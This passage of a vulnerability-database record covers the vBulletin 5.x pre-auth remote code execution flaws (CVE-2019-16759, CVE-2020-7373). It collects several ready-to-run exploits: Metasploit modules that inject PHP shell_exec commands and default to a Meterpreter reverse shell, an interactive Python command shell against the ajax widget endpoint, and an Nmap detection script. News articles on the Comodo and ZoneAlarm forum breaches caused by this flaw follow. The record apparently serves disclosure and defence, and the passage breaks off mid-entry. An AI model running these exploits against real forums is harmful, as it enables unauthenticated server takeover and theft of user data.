\n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS] \n} \n)) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'The URI of the vBulletin base path', '/']), \nOptEnum.new('PHP_CMD', [true, 'Specify the PHP function in which you want to execute the payload.', 'shell_exec', ['shell_exec', 'exec']]) \n]) \n \nregister_advanced_options([ \nOptBool.new('ForceExploit', [false, 'Override check result', false]) \n]) \nend \n \ndef cmd_payload(command) \nreturn(\"echo #{datastore['PHP_CMD']}('#{command}'); exit;\") \nend \n \ndef execute_command(command) \nresponse = send_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path), \n'encode_params' => true, \n'vars_post' => { \n'routestring' => 'ajax/render/widget_php', \n'widgetConfig[code]' => command \n} \n}) \nif (response) && (response.body) \nreturn response \nend \n \nreturn false \nend \n \ndef check \nrand_str = Rex::Text.rand_text_alpha(8) \nreceived = execute_command(cmd_payload(\"echo #{rand_str}\")) \nif received && received.body.include?(rand_str) \nreturn Exploit::CheckCode::Vulnerable \nend \n \nreturn Exploit::CheckCode::Safe \nend \n \ndef exploit \nunless check.eql? Exploit::CheckCode::Vulnerable \nunless datastore['ForceExploit'] \nfail_with(Failure::NotVulnerable, 'The target is not exploitable.') \nend \nend \nvprint_good(\"The target appears to be vulnerable.\") \n \nprint_status(\"Sending #{datastore['PAYLOAD']} command payload\") \ncase target['Type'] \nwhen :unix_cmd, :windows_cmd \ncmd = cmd_payload(payload.encoded) \nvprint_status(\"Generated command payload: #{cmd}\") \n \nreceived = execute_command(cmd) \nif (received) && (datastore['PAYLOAD'] == \"cmd/#{target['Platform']}/generic\") \nprint_warning('Dumping command output in body response') \nif received.body.empty? \nprint_error('Empty response, no command output') \nreturn \nend \nprint_line(\"#{received.body}\") \nend \n \nwhen :php_memory \nvprint_status(\"Generated command payload: #{payload.encoded}\") \nexecute_command(payload.encoded) \nend \nend \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/155633/vbulletin_widgetconfig_rce.rb.txt"}, {"lastseen": "2019-09-26T23:36:58", "description": "", "published": "2019-09-26T00:00:00", "type": "packetstorm", "title": "vBulletin 5.x 0-Day Pre-Auth Remote Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-16759"], "modified": "2019-09-26T00:00:00", "id": "PACKETSTORM:154623", "href": "https://packetstormsecurity.com/files/154623/vBulletin-5.x-0-Day-Pre-Auth-Remote-Command-Execution.html", "sourceData": "`description = [[ \nvBulletin 5.x 0day pre-auth RCE exploit \nThis should work on all versions from 5.0.0 till 5.5.4 \n]] \n \nlocal http = require \"http\" \nlocal shortport = require \"shortport\" \nlocal vulns = require \"vulns\" \nlocal stdnse = require \"stdnse\" \nlocal string = require \"string\" \n \n--- \n-- @usage \n-- nmap -p <port> --script http-vuln-CVE-2019-16759 <target> \n-- \n-- @output \n-- PORT STATE SERVICE \n-- s4430/tcp open http \n-- | http-vuln-CVE-2019-16759: \n-- | VULNERABLE \n-- | vBulletin 5.x 0day pre-auth RCE exploit \n-- | State: VULNERABLE \n-- | IDs: CVE:CVE-2019-16759 \n-- | \n-- | Disclosure date: 2019-09-23 \n-- | References: \n-- | https://seclists.org/fulldisclosure/2019/Sep/31 \n-- |_ https://nvd.nist.gov/vuln/detail/CVE-2019-16759 \n-- \n-- @args http-vuln-cve2019-16759.path The default URL path to request. The default is \"/\". \n \nauthor = \"r00tpgp\" \nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\" \ncategories = { \"vuln\" } \n \nportrule = shortport.http \n \naction = function(host, port) \nlocal vuln = { \ntitle = \"vBulletin 5.x 0day pre-auth RCE exploit\", \nstate = vulns.STATE.NOT_VULN, \ndescription = [[ \nvBulletin 5.x 0day pre-auth RCE exploit \nThis should work on all versions from 5.0.0 till 5.5.4 \n]], \nIDS = { \nCVE = \"CVE-2019-16759\" \n}, \nreferences = { \n'https://seclists.org/fulldisclosure/2019/Sep/31', \n'https://nvd.nist.gov/vuln/detail/CVE-2019-16759', \n}, \ndates = { \ndisclosure = { year = '2019', month = '09', day = '23' } \n} \n} \n \nlocal vuln_report = vulns.Report:new(SCRIPT_NAME, host, port) \n \nlocal method = stdnse.get_script_args(SCRIPT_NAME..\".method\") or \"POST\" \nlocal path = stdnse.get_script_args(SCRIPT_NAME..\".path\") or \"/index.php?routestring=ajax/render/widget_php\" \n \nlocal body = { \n[\"widgetConfig[code]\"] = \"echo shell_exec(\\'echo h4x0000r > /tmp/nmap.check.out; cat /tmp/nmap.check.out\\');exit;\", \n} \n \nlocal options = { \nheader = { \nConnection = \"close\", \n[\"Content-Type\"] = \"application/x-www-form-urlencoded\", \n[\"User-Agent\"] = \"curl/7.65.3\", \n[\"Accept\"] = \"*/*\", \n}, \ncontent = body \n} \nlocal response = http.post(host, port, path, nil, nil, body) \n \nif response and string.match(response.body, \"h4x0000r\") then \nvuln.state = vulns.STATE.VULN \nend \n \nreturn vuln_report:make_output(vuln) \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/154623/http-vuln-CVE-2019-16759.nse.txt"}, {"lastseen": "2020-08-12T01:26:42", "description": "", "published": "2020-08-11T00:00:00", "type": "packetstorm", "title": "vBulletin 5.x Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-16759"], "modified": "2020-08-11T00:00:00", "id": "PACKETSTORM:158830", "href": "https://packetstormsecurity.com/files/158830/vBulletin-5.x-Remote-Code-Execution.html", "sourceData": "`#!/usr/bin/env python3 \n# vBulletin 5.x pre-auth widget_tabbedContainer RCE exploit by @zenofex \n \nimport argparse \nimport requests \nimport sys \n \ndef run_exploit(vb_loc, shell_cmd): \npost_data = {'subWidgets[0][template]' : 'widget_php', \n'subWidgets[0][config][code]' : \"echo shell_exec('%s'); exit;\" % shell_cmd \n} \nr = requests.post('%s/ajax/render/widget_tabbedcontainer_tab_panel' % vb_loc, post_data) \nreturn r.text \n \nap = argparse.ArgumentParser(description='vBulletin 5.x Ajax Widget Template RCE') \nap.add_argument('-l', '--location', required=True, help='Web address to root of vB5 install.') \nARGS = ap.parse_args() \n \nwhile True: \ntry: \ncmd = input(\"vBulletin5$ \") \nprint(run_exploit(ARGS.location, cmd)) \nexcept KeyboardInterrupt: \nsys.exit(\"\\nClosing shell...\") \nexcept Exception as e: \nsys.exit(str(e)) \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/158830/vbulletin50-exec.py.txt"}, {"lastseen": "2020-08-14T01:07:31", "description": "", "published": "2020-08-13T00:00:00", "type": "packetstorm", "title": "vBulletin 5.x Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-7373", "CVE-2019-16759"], "modified": "2020-08-13T00:00:00", "id": "PACKETSTORM:158866", "href": "https://packetstormsecurity.com/files/158866/vBulletin-5.x-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \nprepend Msf::Exploit::Remote::AutoCheck \n \nHttpFingerprint = { method: 'GET', uri: '/', pattern: [/vBulletin.version = '5.+'/] } \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'vBulletin 5.x /ajax/render/widget_tabbedcontainer_tab_panel PHP remote code execution.', \n'Description' => %q{ \nThis module exploits a logic bug within the template rendering code in vBulletin 5.x. \nThe module uses the vBulletin template rendering functionality to render the \n'widget_tabbedcontainer_tab_panel' template while also providing the 'widget_php' argument. \nThis causes the former template to load the latter bypassing filters originally put in place \nto address 'CVE-2019-16759'. This also allows the exploit to reach an eval call with user input \nallowing the module to achieve PHP remote code execution on the target. This module has been \ntested successfully on vBulletin version 5.6.2 on Ubuntu Linux. \n}, \n'Author' => [ \n'Zenofex <zenofex[at]exploitee.rs>' # (@zenofex) PoC and Metasploit module \n], \n'References' => [ \n['URL', 'https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/'], \n['CVE', '2020-7373'] \n], \n'DisclosureDate' => '2020-08-09', \n'License' => MSF_LICENSE, \n'Platform' => ['php', 'unix', 'windows'], \n'Arch' => [ARCH_CMD, ARCH_PHP], \n'Privileged' => true, \n'Targets' => [ \n[ \n'Meterpreter (PHP In-Memory)', \n'Platform' => 'php', \n'Arch' => [ARCH_PHP], \n'Type' => :php_memory, \n'DefaultOptions' => { \n'PAYLOAD' => 'php/meterpreter/reverse_tcp', \n'DisablePayloadHandler' => false \n} \n], \n[ \n'Unix (CMD In-Memory)', \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_cmd, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/generic', \n'DisablePayloadHandler' => true \n} \n], \n[ \n'Windows (CMD In-Memory)', \n'Platform' => 'windows', \n'Arch' => ARCH_CMD, \n'Type' => :windows_cmd, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/windows/generic', \n'DisablePayloadHandler' => true \n} \n] \n], \n'DefaultTarget' => 0, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS] \n} \n) \n) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'The URI of the vBulletin base path', '/']), \nOptEnum.new('PHP_CMD', [true, 'Specify the PHP function in which you want to execute the payload.', 'shell_exec', ['shell_exec', 'exec']]) \n]) \n \nend \n \ndef cmd_payload(command) \n\"echo #{datastore['PHP_CMD']}(base64_decode('#{Rex::Text.encode_base64(command)}')); exit;\" \nend \n \ndef execute_command(command) \nresponse = send_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/ajax/render/widget_tabbedcontainer_tab_panel'), \n'encode_params' => true, \n'vars_post' => { \n'subWidgets[0][template]' => 'widget_php', \n'subWidgets[0][config][code]' => command \n} \n}) \nif response && response.body \nreturn response \nend \n \nfalse \nend \n \ndef check \nrand_str = Rex::Text.rand_text_alpha(8) \nreceived = execute_command(cmd_payload(\"echo #{rand_str}\")) \nif received && received.body.include?(rand_str) \nreturn Exploit::CheckCode::Vulnerable \nend \n \nExploit::CheckCode::Safe \nend \n \ndef exploit \nprint_status(\"Sending #{datastore['PAYLOAD']} command payload\") \ncase target['Type'] \nwhen :unix_cmd, :windows_cmd \ncmd = cmd_payload(payload.encoded) \nvprint_status(\"Generated command payload: #{cmd}\") \n \nreceived = execute_command(cmd) \nif received && (datastore['PAYLOAD'] == \"cmd/#{target['Platform']}/generic\") \nprint_warning('Dumping command output in body response') \nif received.body.empty? \nprint_error('Empty response, no command output') \nreturn \nend \nprint_line(received.body.to_s) \nend \n \nwhen :php_memory \nvprint_status(\"Generated command payload: #{payload.encoded}\") \nexecute_command(payload.encoded) \nend \nend \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/158866/vbulletin_widget_template_rce.rb.txt"}], "exploitpack": [{"lastseen": "2020-04-01T20:41:02", "description": "\nvBulletin 5.x - Remote Command Execution (Metasploit)", "edition": 1, "published": "2019-09-30T00:00:00", "title": "vBulletin 5.x - Remote Command Execution (Metasploit)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-16759"], "modified": "2019-09-30T00:00:00", "id": "EXPLOITPACK:195EC6198873D3265FF46CC0358D10F2", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'vBulletin 5.x 0day pre-quth RCE exploit',\n 'Description' => %q{\n vBulletin 5.x 0day pre-auth RCE exploit.\n This should work on all versions from 5.0.0 till 5.5.4\n },\n 'Platform' => 'php',\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Reported by: anonymous', # reported by\n 'Original exploit by: anonymous', # original exploit\n 'Metasploit mod by: r00tpgp', # metasploit module\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x22\",\n },\n 'References' =>\n [\n ['CVE', 'CVE-2019-16759'],\n ['EDB', 'NA'],\n ['URL', 'https://seclists.org/fulldisclosure/2019/Sep/31'],\n ['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16759']\n ],\n 'Arch' => ARCH_PHP,\n 'Targets' => [\n [ 'Automatic Targeting', { 'auto' => true } ],\n # ['vBulletin 5.0.X', {'chain' => 'vB_Database'}],\n # ['vBulletin 5.1.X', {'chain' => 'vB_Database_MySQLi'}],\n ],\n 'DisclosureDate' => 'Sep 23 2019',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [ true, \"The base path to the web application\", \"/\"])\n ])\n\n end\n\n def check\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path,'/index.php?routestring=ajax/render/widget_php'),\n 'encode_params' => false,\n 'vars_post' => \n {\n 'widgetConfig[code]' => \"echo shell_exec(\\'echo h4x0000r4l1f4 > /tmp/msf.check.out; cat /tmp/msf.check.out\\');exit;\",\n }\n })\n\n if res && res.body && res.body.include?('h4x0000r4l1f4')\n return Exploit::CheckCode::Vulnerable\n end\n\n Exploit::CheckCode::Safe\n end\n\n def exploit\n print_status(\"Sending payload.....\")\n resp = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path,'/index.php?routestring=ajax/render/widget_php'),\n 'encode_params' => false,\n 'vars_post' =>\n {\n #'widgetConfig[code]' => \"echo \" + payload.encoded + \"exit;\",\n\t 'widgetConfig[code]' => payload.encoded,\n }\n })\n #unless resp and resp.code == 200\n # fail_with(Failure::Unknown, \"Exploit failed.\")\n #end\n\n #print_good(\"Success!\")\n #print_line(resp.body)\n\n end\nend", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "canvas": [{"lastseen": "2019-12-11T14:23:08", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-16759"], "description": "**Name**| vbulletin_widget_rce \n---|--- \n**CVE**| CVE-2019-16759 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| RCE via widgetConfig[code] paramater in vBulletin \n**Notes**| CVE Name: CVE-2019-16759 \nVENDOR: vBulletin \nNOTES: \nAn unauthenticated code execution bug can be exploited on the vBulletin core for the following versions: \n \n* 5.x.x &lt;= 5.5.4 (Tested on Ubuntu 18.10) \n \nRepeatability: Infinite \nReferences: https://forum.vbulletin.com/forum/vbulletin-announcements/vbulletin-announcements_aa/4422707-vbulletin-security-patch-released-versions-5-5-2-5-5-3-and-5-5-4 \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=2019-16759 \nDate public: 23/09/2019 \n\n", "edition": 1, "modified": "2019-09-24T22:15:00", "published": "2019-09-24T22:15:00", "id": "VBULLETIN_WIDGET_RCE", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/vbulletin_widget_rce", "title": "Immunity Canvas: VBULLETIN_WIDGET_RCE", "type": "canvas", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2019-11-11T17:07:52", "bulletinFamily": "info", "cvelist": ["CVE-2019-16759"], "description": "[](<https://1.bp.blogspot.com/-lO6J7aRP7a0/Xcl7h55teFI/AAAAAAAA1sA/jJrdfv_1UhMsLLsIeb5fAzEzTxxNiWV1wCLcBGAsYHQ/s728-e100/ZoneAlarm-forum-data-breach.png>)\n\nZoneAlarm, an internet security software company owned by Israeli cybersecurity firm Check Point Technologies, has suffered a data breach exposing data of its discussion forum users, the company confirmed The Hacker News. \n \nWith nearly 100 million downloads, ZoneAlarm offers antivirus software, firewall, and additional virus protection solutions to home PC users, small businesses, and mobile phones worldwide. \n \nThough neither ZoneAlarm or its parent company Check Point has yet publicly disclosed the security incident, the company quietly sent an alert via email to all affected users over this weekend, The Hacker News learned. \n \nThe email-based breach notification advised ZoneAlarm forum users to immediately change their forum account passwords, informing them hackers have unauthorizedly gained access to their names, email addresses, hashed passwords, and date of births. \n \nMoreover, the company has also clarified that the security incident only affects users registered with the \"**forums.zonealarm.com**\" domain, which has a small number of subscribers, nearly 4,500. \n\n\n \n\"This [forum] is a separate website from any other website we have and used only by a small number of subscribers who registered to this specific forum,\" the email notification reads. \n \n\"The website became inactive in order to fix the problem and will resume as soon as it is fixed. You will be requested to reset your password once joining the forum.\" \n \n\n\n## Hackers Exploited Recent vBulletin 0-Day Flaw\n\n \nUpon reaching out to the company, a spokesperson confirmed The Hacker News that attackers exploited a known critical RCE vulnerability ([CVE-2019-16759](<https://thehackernews.com/2019/09/vbulletin-zero-day-exploit.html>)) in the vBulletin forum software to compromise ZoneAlarm's website and gain unauthorized access. \n \nFor those unaware, this flaw affected vBulletin versions 5.0.0 up to the latest 5.5.4, for which the project maintainers later released patch updates, but only for recent versions 5.5.2, 5.5.3, and 5.5.4. \n\n\n[](<https://1.bp.blogspot.com/-F7r0_5rBLkw/Xcl8ZDReWLI/AAAAAAAA1sI/0sC52j9ADsA7FkGqpPKB1-VZ3YYnbiENACLcBGAsYHQ/s728-e100/ZoneAlarm-forum.png>)\n\nThe Hacker News found that, surprisingly, the security company itself was running an outdated 5.4.4 version of the vBulletin software until last week that let attackers compromise the website easily. \n \nIt's the same [then-zero-day vBulletin exploit](<https://thehackernews.com/2019/09/vbulletin-zero-day-exploit.html>) that an anonymous hacker publicly disclosed in late September this year, which, if exploited, could allow remote attackers to take full control over unpatched vBulletin installations. \n\n\n[](<https://bit.ly/2nAQ7y5> \"Web Application Firewall\" )\n\n \nMoreover, a week after that, the same flaw was also exploited by unknown attackers to [hack the Comodo forum](<https://thehackernews.com/2019/10/Comodo-vbulletin-hacked.html>) website, which exposed login account information of over nearly 245,000 Comodo Forums users. \n \nThough the ZoneAlarm team learned about the breach just late last week and immediately informed affected users, it's unclear exactly when the attackers breached the website. \n\n\n[](<https://1.bp.blogspot.com/-HiAbp0IFtFU/XcmB5MYkaTI/AAAAAAAA1sU/3JZWoSzyWk8_KuSaH4s-ls9SE6qWJWjawCLcBGAsYHQ/s728-e100/ZoneAlarm-hacked.png>)\n\n\"ZoneAlarm is conducting an investigation into the matter. We take pride in the fact that we took a proactive approach once this incident was detected and within 24 hours and alerted the forum members,\" the company's spokesperson told the Hacker News. \n \nSince the ZoneAlarm forum website is down at the time of writing, users would not be able to change their account password on the forum at this moment. \n \nBut if you are one of the affected users, you are also recommended to change your passwords for any other online account where you use the same credentials, and do the same for the ZoneForum website as soon as the site goes live again. \n\n\nHave something to say about this article? Comment below or share it with us on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter](<https://twitter.com/thehackersnews>) or our [LinkedIn Group](<https://www.linkedin.com/company/the-hacker-news/>).\n", "modified": "2019-11-11T15:44:48", "published": "2019-11-11T15:27:00", "id": "THN:DA6A48C093F31D7EE1BB90D7EE577177", "href": "https://thehackernews.com/2019/11/zonealarm-forum-data-breach.html", "type": "thn", "title": "Hackers Breach ZoneAlarm's Forum Site \u2014 Outdated vBulletin to Blame", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-10-01T14:31:16", "bulletinFamily": "info", "cvelist": ["CVE-2019-16759"], "description": "[](<https://1.bp.blogspot.com/-D1YWqD0VmLk/XZM1oajFtaI/AAAAAAAA1So/YtMUY09GjFk0H56g_O_htZEYhYxn4mr9ACLcBGAsYHQ/s728-e100/Comodo-vbulletin-forums.png>)\n\nIf you have an account with the Comodo discussion board and support forums, also known as ITarian Forum, you should change your password immediately. \n \nCybersecurity company Comodo has become one of the major victims of a recently disclosed [vBulletin 0-day vulnerability](<https://thehackernews.com/2019/09/vbulletin-zero-day-exploit.html>), exposing login account information of over nearly 245,000 users registered with the Comodo Forums websites. \n \nIn a brief [security notice](<https://forums.comodo.com/general-announcements/important-security-notice-about-comodo-forums-accounts-t124921.0.html>) published earlier today, Comodo admitted the data breach, revealing that an unknown attacker exploited the vBulletin vulnerability (CVE-2019-16759) and potentially gained access to Comodo Forums database. \n \nIt's worth noting that Comodo forum was hacked on September 29, almost four days after vBulletin developers released a patch to let administrators address the vulnerability, but the company failed to apply the patches on time. \n\n\n \nAs The Hacker News broke the news last week, an anonymous hacker publicly disclosed details of a critical then-unpatched vulnerability in vBulletin\u2014one of the widely used internet forum software\u2014which could have allowed remote attackers to execute arbitrary commands on the web server. \n \nHowever, Comodo has not specified which of the company's forums has been hacked out of the two separate forums it owns. \n \nOne the forums, \"forums.comodo.com,\" is hosted at Comodo's own sub-domain and is powered by the different forum software, called Simple Machines Forum, and appears not to be impacted. \n \nThe second forum, which runs over the vBulletin software and has likely been hacked, is ITarian Forum hosted at \"forum.itarian.com,\" a discussion board where the company offers technical assistance to the users of its products. \n \n\n\n[](<https://1.bp.blogspot.com/-Rv1ReDGkeDk/XZM0KEdJyUI/AAAAAAAA1Sc/EzAerzwby9Ahun_vlQ2OzU-A8Ao6DkNAACLcBGAsYHQ/s728-e100/Comodo-vbulletin-forums-hacked.png>)\n\n \n\n\n## What Type of Information Was Accessed?\n\n \nThe breached database contains forum users' information, including: \n \n\n\n * Login username\n * Name\n * Email address\n * Hashed passwords\n * Last IP address used to access the forums\n * Some social media usernames in very limited situations.\n \nThe company became aware of the security breach over the weekend on September 29 morning, which suggests users registered on Comodo Forums until this Sunday are impacted by the breach. \n \n\n\n> \"Very recently a new vulnerability in the vBulletin software, which is one of the most popular server applications for website comments including the Comodo Forums, was made public,\" the company says.\n\n \n\n\n> \"Over the weekend at 4:57 am ET on Sunday, September 29, 2019, we became aware that this security flaw in the vBulletin software had become exploited resulting in a potential data breach on the Comodo Forums.\"\n\n \nImmediately after detecting the security intrusion, the Comodo IT infrastructure team immediately took the forums offline in an attempt to mitigate the vBulletin exploit and applied the recommended security patches. \n \n\n\n## What Users Should Do Now?\n\n \nIf you have registered with Comodo Forums on or before September 29, you are highly recommended to immediately change the password for your forum account to a strong and unique one and for any other online account where you use the same credentials. \n\n\n[](<https://bit.ly/2nAQ7y5> \"Web Application Firewall\" )\n\n \nAlthough the account passwords were hashed in vBulletin for the Comodo Forum users, Comodo advises users to change their passwords as part of good password practices. \n \n\n\n> \"We deeply regret any inconvenience or distress this vulnerability may have caused you, our users,\" the company says. \n \n\"As members of our community of Comodo Forum users, we want to reassure you that we have put in place measures to ensure that vulnerabilities in third-party software, such as vBulletin, will be patched immediately when patches become available.\"\n\n \nBesides this, at the time of writing, the company has also temporarily disabled the registration for new users on the affected forums, The Hacker News confirmed.\n", "modified": "2019-10-01T11:39:49", "published": "2019-10-01T11:23:00", "id": "THN:86C3930A6E4C818EFA5133059C21FA57", "href": "https://thehackernews.com/2019/10/Comodo-vbulletin-hacked.html", "type": "thn", "title": "Comodo Forums Hack Exposes 245,000 Users' Data \u2014 Recent vBulletin 0-day Used", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-09-26T07:42:51", "bulletinFamily": "info", "cvelist": ["CVE-2019-16759"], "description": "[](<https://1.bp.blogspot.com/-jo4OCB7-bNU/XYpmETftYoI/AAAAAAAA1NE/b6JfG9m7GuYZKB5OYjDDarpoYXHBG1vQwCLcBGAsYHQ/s728-e100/vBulletin-zero-day-exploit.jpg>)\n\nAn anonymous hacker today publicly revealed details and proof-of-concept exploit code for an unpatched, critical zero-day remote code execution vulnerability in vBulletin\u2014one of the widely used internet forum software, The Hacker News has learned. \n \nOne of the reasons why the vulnerability should be viewed as a severe issue is not just because it is remotely exploitable, but also doesn't require authentication. \n \nWritten in PHP, vBulletin is a widely used proprietary Internet forum software package that powers more than 100,000 websites on the Internet, including Fortune 500 and Alexa Top 1 million companies websites and forums. \n \nAccording to details [published](<https://seclists.org/fulldisclosure/2019/Sep/31>) on the Full Disclosure mailing list, the hacker claims to have found a remote code execution vulnerability that appears to affect vBulletin versions 5.0.0 till the latest 5.5.4. \n\n\n \nThe Hacker News has independently verified that the flaw works, as described, and affects the latest version of vBulletin software, which eventually leaves thousands of forum websites at risk of hacking. \n \nThe vulnerability resides in the way an internal widget file of the forum software package accepts configurations via the URL parameters and then parse them on the server without proper safety checks, allowing attackers to inject commands and remotely execute code on the system. \n \n\n\n[](<https://1.bp.blogspot.com/-2sdYToJLaQQ/XYpkqgFI9EI/AAAAAAAA1M4/w0VDwMRiNfoZfFRP-fR9ZzojmphmDU9WQCLcBGAsYHQ/s728-e100/vBulletin-exploit.jpg>)\n\n \nAs a proof-of-concept, the hacker has also released a python-based exploit that could make it easier for anyone to exploit the zero-day in the wild. \n \nSo far, the Common Vulnerabilities and Exposures (CVE) number has not been assigned to the vulnerability. \n\n\n \nThe Hacker News has also informed vBulletin project maintainers about the vulnerability disclosure and expect them to patch the security issue before hackers start exploiting it to target vBulletin installations. \n \nA separate cybersecurity researcher analyzed the [core reason of this vulnerability](<https://gist.github.com/jamesbercegay/a8f169059c6184e76b12d98d887542b3>) and posted details soon after The Hacker News publish the article. \n \nMeanwhile, a GitHub user also released a [simple script](<https://github.com/Frint0/mass-pwn-vbulletin>) that could let anyone scan the Internet to find vBulletin websites using Shodan search engine and automatically check for vulnerable sites. \n \nWe will update the article and inform the readers via social media as soon as we hear back from the vBulletin maintainers. \n \n\n\n## Update \u2014 Hackers Actively Exploiting vBulletin Zero-Day; Patches Now Available\n\n \nAccording to multiple infosec community sources in contact with The Hacker News, various hacking groups and individual bug hunters have already started scanning the Internet to target vulnerable vBulletin websites. \n \nAfter The Hacker News broke the news and informed the vBulletin team about the zero-day public disclosure, now tracked as CVE-2019-16759, the project maintainers today released [security patches for vBulletin](<https://forum.vbulletin.com/forum/vbulletin-announcements/vbulletin-announcements_aa/4422707-vbulletin-security-patch-released-versions-5-5-2-5-5-3-and-5-5-4?patch>) versions 5.5.2, 5.5.3, and 5.5.4.\n", "modified": "2019-09-26T06:48:12", "published": "2019-09-24T18:57:00", "id": "THN:3C66A5BF1D6CB09FB0A4CEB90614BEC0", "href": "https://thehackernews.com/2019/09/vbulletin-zero-day-exploit.html", "type": "thn", "title": "[Unpatched] Critical 0-Day RCE Exploit for vBulletin Forum Disclosed Publicly", "cvss": {"score": 0.0, "vector": "NONE"}}], "exploitdb": [{"lastseen": "2019-09-30T07:30:12", "description": "", "published": "2019-09-30T00:00:00", "type": "exploitdb", "title": "vBulletin 5.x - Remote Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-16759"], "modified": "2019-09-30T00:00:00", "id": "EDB-ID:47437", "href": "https://www.exploit-db.com/exploits/47437", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'vBulletin 5.x 0day pre-quth RCE exploit',\r\n 'Description' => %q{\r\n vBulletin 5.x 0day pre-auth RCE exploit.\r\n This should work on all versions from 5.0.0 till 5.5.4\r\n },\r\n 'Platform' => 'php',\r\n 'License' => MSF_LICENSE,\r\n 'Author' => [\r\n 'Reported by: anonymous', # reported by\r\n 'Original exploit by: anonymous', # original exploit\r\n 'Metasploit mod by: r00tpgp', # metasploit module\r\n ],\r\n 'Payload' =>\r\n {\r\n 'BadChars' => \"\\x22\",\r\n },\r\n 'References' =>\r\n [\r\n ['CVE', 'CVE-2019-16759'],\r\n ['EDB', 'NA'],\r\n ['URL', 'https://seclists.org/fulldisclosure/2019/Sep/31'],\r\n ['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16759']\r\n ],\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' => [\r\n [ 'Automatic Targeting', { 'auto' => true } ],\r\n # ['vBulletin 5.0.X', {'chain' => 'vB_Database'}],\r\n # ['vBulletin 5.1.X', {'chain' => 'vB_Database_MySQLi'}],\r\n ],\r\n 'DisclosureDate' => 'Sep 23 2019',\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [ true, \"The base path to the web application\", \"/\"])\r\n ])\r\n\r\n end\r\n\r\n def check\r\n res = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path,'/index.php?routestring=ajax/render/widget_php'),\r\n 'encode_params' => false,\r\n 'vars_post' => \r\n {\r\n 'widgetConfig[code]' => \"echo shell_exec(\\'echo h4x0000r4l1f4 > /tmp/msf.check.out; cat /tmp/msf.check.out\\');exit;\",\r\n }\r\n })\r\n\r\n if res && res.body && res.body.include?('h4x0000r4l1f4')\r\n return Exploit::CheckCode::Vulnerable\r\n end\r\n\r\n Exploit::CheckCode::Safe\r\n end\r\n\r\n def exploit\r\n print_status(\"Sending payload.....\")\r\n resp = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path,'/index.php?routestring=ajax/render/widget_php'),\r\n 'encode_params' => false,\r\n 